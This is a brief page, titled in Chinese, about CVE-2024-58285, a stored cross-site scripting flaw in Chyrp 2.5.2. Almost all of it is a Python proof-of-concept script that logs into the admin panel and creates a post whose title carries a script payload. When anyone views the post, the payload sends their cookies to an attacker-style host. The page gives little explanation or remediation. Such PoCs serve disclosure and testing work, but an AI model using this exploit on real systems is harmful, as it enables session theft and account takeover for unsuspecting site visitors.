CVE-2024-58285: Chyrp 2.5.2 存储型跨站脚本漏洞

import requests import sys # CVE-2024-58285 PoC - Chyrp 2.5.2 Stored XSS via Post Title # This PoC demonstrates how an authenticated user can inject malicious # JavaScript into post titles that will be executed when viewed by others TARGET_URL = "http://target-server.com/chyrp" USERNAME = "attacker" PASSWORD = "password123" def exploit(): # Step 1: Login to get session session = requests.Session() login_url = f"{TARGET_URL}/admin/?action=login" login_data = { "identifier": USERNAME, "password": PASSWORD } print("[*] Attempting to login...") response = session.post(login_url, data=login_data) if "Logged in" not in response.text and response.status_code != 200: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Create post with XSS payload in title post_url = f"{TARGET_URL}/admin/?action=new_post" # XSS payload - steals cookies xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' post_data = { "title": xss_payload, "body": "This is a test post", "post": "Save" } print(f"[*] Creating post with XSS payload in title...") response = session.post(post_url, data=post_data) if response.status_code == 200: print("[+] Post created successfully") print(f"[!] XSS payload stored: {xss_payload}") print("[!] Payload will execute when any user views the post") return True else: print("[-] Failed to create post") return False if __name__ == "__main__": exploit()